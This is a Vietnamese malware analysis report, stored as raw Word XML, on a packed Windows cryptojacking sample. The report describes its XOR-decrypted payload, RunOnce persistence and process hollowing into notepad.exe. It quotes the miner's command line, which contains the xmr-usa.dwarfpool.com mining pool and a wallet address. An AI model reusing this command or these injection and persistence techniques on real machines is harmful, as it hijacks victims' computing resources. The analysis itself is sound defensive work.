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BÁO CÁO PHÂN TÍCH MÃ ĐỘC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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Phân tích mã độc sample.exe</w:t>
      </w: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color w:val="0000FF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tổng quan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vi-VN"/>
        </w:rPr>
        <w:t>Load File vào detect it easy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và CFF explore để có cái nhìn tổng quan về mẫu mã  độc sample</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r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+File 32bit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+Dung lượng 730kb nhưng import table  chỉ sử dụng 1 số api có thể bị packed</w:t>
      </w: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vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Phân tich tĩnh và phân tích động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-Tool sử dụng Ida </w:t>
      </w:r>
    </w:p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1.Phân tích file sample.exe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-Phân tích &amp; rename lại hàm cho dễ nhìn thì như hình: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1135" cy="3562985"/>
            <wp:effectExtent l="0" t="0" r="5715" b="184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3781425" cy="11430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-Dữ liệu mã hóa bằng phép xor khá đơn giản sau khi thử giải mã vài byte đầu thì thấy kí hiệu MZ của cấu trúc PE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-Sử dụng một funtion ịnject để ịnject string vào trong câu trúc PE sau khi đã giải mã.Như hình trên thì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String “xmr-usa.dwarfpool.com:8050” tại vị trí 74688 inject vào PE_data</w:t>
      </w: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Xử kí &amp; thực thi PE_data</w:t>
      </w:r>
    </w:p>
    <w:p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-Hàm sub_13D1350</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2711450"/>
            <wp:effectExtent l="0" t="0" r="825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-Cấp phát vùng nhớ có quyền thực thi sau đó copy toán bộ PE vào trong vùng nhớ đó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-Phân tích hàm sub_13D12C3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="4498975"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1587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4029075" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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Hàm này xử lí tìm kiếm địa chỉ IAT của PE_data và sử dụng hàm loadmodule tương ứng để tìm kiếm các địa chỉ tương ứng với các api trong PE_data việc này giống như ánh xạ vào không gian địa chỉ process</w:t>
      </w:r>
    </w:p>
    <w:p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vi-VN"/>
        </w:rPr>
        <w:t>Thực thi 1 process khác trong sample.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe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67050" cy="1752600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en-US"/>
        </w:rPr>
        <w:t>-Sau khi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> tìm kiếm các các địa chỉ api trên các module kernel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32.dll,user32.dll,…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>thì nó sẽ thực thi file tại AddressOfEntryPoint dựa trên câu trúc PE file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-Để tiện lợi  cho việc phân tích thì mình sẽ dump dữ liệu ra thì có 2 cách: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Có thể sử dụng plugin OllDumpEx trong x64dbg để dump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Dùng idapython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-Sau khi dump đặt tên là dump_sample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vi-VN"/>
        </w:rPr>
        <w:t>2.Phân tích</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dump_sample</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="3521075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="317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Sử dụng api CreateDirectoryW để tạo folder “C:\Users\user\AppData\Local\hjfdWLFJwt”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4905375" cy="20002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+Tại folder mới tạo 1 file executable taskman.exe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vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hàm r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>egistry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="4358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+Nếu “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce” đã được tạo thì sẽ thực hiện lấy giá trị tại “ftwdGcTbXm” và ngược lại </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>àm handleProcessx32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="100" w:firstLineChars="50"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3883025"/>
            <wp:effectExtent l="0" t="0" r="5715" b="317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+Đoạn đầu khá giống với hàm handleProcessx64 việc tạo ra 1 process notepad với cmd =’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a cryptonight -o stratum+tcp://xmr-usa.dwarfpool.com:8050 -u 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbS3d2ZdUYfaKLkAbBLe -p x -t 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>’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+Sau khi hàm này tạo ra process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mới thì viết vào vùng nhớ  của process đó một cấu trúc PE_data sau đó tiếp tục thực thi process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Dump &amp; phân tích PE_data2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-Detect it easy thì File bị packed bằng upx sau khi unpacked upx như hình bên dưới:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3368040"/>
            <wp:effectExtent l="0" t="0" r="5080" b="381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-Các option tìm thấy trong hàm handleArg,argv &amp; agrc chính cmd khi tạo với proccess notepad.exe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4905375" cy="4772025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="4302760"/>
            <wp:effectExtent l="0" t="0" r="8255" b="25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 -a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>pecifiy the algorithm to use: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Cryptonight</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>+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 xml:space="preserve"> - o  URL of mining server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p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stratum+tcp://xmr-usa.dwarfpool.com:8050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-u username for mining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+-p password for mining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+-t  number of miner threads (default: number of processors)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-Sau khi tra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>các string option trên google tìm được project (https://github.com/tpruvot/cpuminer-multi) so sánh với Pseudocode trên Ida thì khá giống với project này đây là công cụ sử dụng khai thác crypto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-Hàm handleProcessx64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="1245870"/>
            <wp:effectExtent l="0" t="0" r="254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en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tạo process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> notepad.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">với </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd = ‘ -a cryptonight -o stratum+tcp://xmr-usa.dwarfpool.com:8050 -u4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbS3d2ZdUYfaKLkAbBLe -p x -t 2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Sau khi tạo process thì dùng api NtWriteVirtualMemory nó tương tự như WriteProcessMemory cũng có cấu trúc PE được viết vào vùng nhớ process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Dump &amp; phân tích processx64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-Detect it easy thì File bị packed bằng upx sau khi unpacked upx như hình bên dưới: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3327400"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635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04210"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1524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/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/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-Các option tìm thấy trong hàm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parse_arg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>,argv &amp; agrc tương tự như handleProcessx32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4290695"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1460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-Mục đích của handlProcessx64 dùng để khai thác crypto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color w:val="4472C4" w:themeColor="accent5"/>
          <w:lang w:val="vi-V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vi-VN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent5"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Tổng kết</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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vi-VN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>-Mã độc sinh ra proccess notepad nhằm mục đích ẩn đi chương trình khai thác crypto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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>-Các kĩ thuật đặc biệt sử dụng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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>+Anti-reverse:upx,anti-diassembly,ịnject string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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">-Mục đích chính của mã độc thực hiện khai thác crypto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</w:t>
      </w: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60E3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68242A"/>
    <w:rsid w:val="0357383E"/>
    <w:rsid w:val="07FB1145"/>
    <w:rsid w:val="0AAC0220"/>
    <w:rsid w:val="0AE67114"/>
    <w:rsid w:val="278321E4"/>
    <w:rsid w:val="327744C7"/>
    <w:rsid w:val="33052F0B"/>
    <w:rsid w:val="35717E01"/>
    <w:rsid w:val="47B44AB8"/>
    <w:rsid w:val="4B917F95"/>
    <w:rsid w:val="519E0AC3"/>
    <w:rsid w:val="65E83FE7"/>
    <w:rsid w:val="69160E38"/>
    <w:rsid w:val="6E3A51BB"/>
    <w:rsid w:val="71277D65"/>
    <w:rsid w:val="744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2022-05-28T02:46:00Z</dcterms:created>
  <dc:creator>anhsa</dc:creator>
  <cp:lastModifiedBy>anhsa</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-03T16:30:13Z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674BE543B854464C8BE449754CE6350D</vt:lpwstr>
  </property>
</Properties>
</file>